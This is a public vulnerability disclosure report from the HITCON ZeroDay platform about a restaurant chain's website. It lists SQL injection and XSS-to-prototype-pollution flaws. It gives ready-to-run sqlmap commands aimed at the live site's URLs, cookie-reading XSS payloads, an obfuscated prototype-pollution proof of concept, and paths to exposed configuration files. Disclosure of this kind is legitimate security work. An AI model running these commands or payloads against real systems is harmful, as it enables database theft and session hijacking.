Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00538
- 發信 Vendor: 鬍鬚張股份有限公司
- Title: 鬍鬚張魯肉飯 網站存在 XSS to 原型汙染 與 SQL injection
- Introduction: 網站存在 XSS to 原型汙染 與 SQL injection
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2022/07/27 19:44:40 : 新提交 (由 BTtea 更新此狀態)
- 2022/07/28 15:00:41 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/08/01 16:44:38 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/08/01 16:44:38 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/08/01 16:44:39 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/09/26 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2022-00538
- 通報者:blacktea_player (BTtea)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
https://www.fmsc.com.tw/ch/showpdf.php
https://www.fmsc.com.tw/ch/resume.php
https://www.fmsc.com.tw/ch/storesub1.php
敘述
使用工具 SQLmap 輔助測試 (以下若使用SQLmap工具進行注入時有中斷問題,請去除 --batch 參數後進行注入,遇到詢問連線異常是否繼續測試的訊息請選擇 y )
原型汙染成因為 jquery 版本過低所導致
https://www.fmsc.com.tw/ch/food3.php?idno=5&p2idno=187
GET 參數 idno , p2idno 存在 SQL injection
SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://www.fmsc.com.tw/ch/food3.php?idno=5&p2idno=187" --dbs --batch -p idno
( -p 參數可換 )
https://www.fmsc.com.tw/ch/showpdf.php?f=155892524907.pdf
GET 參數 f 存在 XSS
xss payload : " onload=alert(document.cookie)//https://www.fmsc.com.tw/ch/resume.php?idno=&rname=&sname=鬍鬚張連鎖總部&storeidno=157
GET 參數 sname 存在 XSS to 原型汙染
xss payload : <script>alert(document.cookie)</script>
xss to 原型汙染 PoC payload : <script>$.extend(true,{},JSON.parse(eval(String.fromCharCode(39,123,34,95,95,112,114,111,116,111,95,95,34,58,123,34,122,34,58,49,50,51,125,125,39))));alert(z);</script>GET 參數 storeidno 存在 SQL injection
SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://www.fmsc.com.tw/ch/resume.php?idno=&rname=&sname=鬍鬚張連鎖總部&storeidno=157" --dbs --batch -p storeidno
https://www.fmsc.com.tw/ch/storesub1.php
post : country=10&city=33&area=90&store=192&storekw=門市搜尋
GET 參數 country , city , area 存在 SQL injection
SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://www.fmsc.com.tw/ch/storesub1.php" --data "country=10&city=33&area=90&store=192&storekw=門市搜尋" --batch --dbs -p country
( -p 參數可換 )
無意義但不應該被存取的站點目錄可能導致資訊洩漏或其他危害
http://www.fmsc.com.tw/.editorconfig
http://www.fmsc.com.tw/.gitattributes
http://www.fmsc.com.tw/.travis.yml
http://www.fmsc.com.tw/LICENSE
http://www.fmsc.com.tw/README.MD
http://www.fmsc.com.tw/bower.json
http://www.fmsc.com.tw/composer.json
http://www.fmsc.com.tw/contributing.md
http://www.fmsc.com.tw/docs
http://www.fmsc.com.tw/package
ch 目錄底下
http://www.fmsc.com.tw/ch/.editorconfig
http://www.fmsc.com.tw/ch/.gitattributes
http://www.fmsc.com.tw/ch/.travis.yml
http://www.fmsc.com.tw/ch/LICENSE
http://www.fmsc.com.tw/ch/README.MD
http://www.fmsc.com.tw/ch/bower.json
http://www.fmsc.com.tw/ch/composer.json
http://www.fmsc.com.tw/ch/contributing.md
http://www.fmsc.com.tw/ch/docs
http://www.fmsc.com.tw/ch/hello
http://www.fmsc.com.tw/ch/index.php/login/
http://www.fmsc.com.tw/ch/log
http://www.fmsc.com.tw/ch/package.json
http://www.fmsc.com.tw/ch/store/app/etc/local.xml
http://www.fmsc.com.tw/ch/test.html
修補建議
更新 jquery 至最新本